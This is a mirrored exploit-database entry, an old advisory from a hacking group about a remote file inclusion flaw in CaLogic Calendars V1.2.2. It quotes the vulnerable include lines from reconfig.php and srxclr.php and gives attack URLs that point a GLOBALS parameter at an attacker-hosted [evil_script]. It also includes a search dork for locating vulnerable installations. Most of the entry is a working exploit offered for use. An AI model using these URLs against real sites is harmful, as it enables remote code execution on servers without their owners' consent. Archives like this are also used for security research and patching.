exploit-db-mirror/exploits/php/webapps/1809.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

31 lines
No EOL
1 KiB
Text

################ DEVIL TEAM THE BEST POLISH TEAM #################
#CaLogic Calendars V1.2.2 - Remote File Include
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
#dork: CaLogic Calendars V1.2.2
##################################################################
reconfig.php:
[code]
include_once("./include/config.php");
include_once($GLOBALS["CLPath"]."/classes/session.php");
include_once($GLOBALS["CLPath"]."/include/gfunc.php");
include_once($GLOBALS["CLPath"]."/classes/calogicautomation.php");
[/code]
http://site.com/[path]/reconfig.php?GLOBALS[CLPath]=[evil_script]
srxclr.php:
[code]
include_once("./include/config.php");
include_once($GLOBALS["CLPath"]."/include/calfunc.php");
include_once($GLOBALS["CLPath"]."/include/gfunc.php");
include_once($GLOBALS["CLPath"]."/include/efuncs.php");
[/code]
http://site.com/[path]/srxclr.php?GLOBALS[CLPath]=[evil_script]
#pozdro :)
# milw0rm.com [2006-05-20]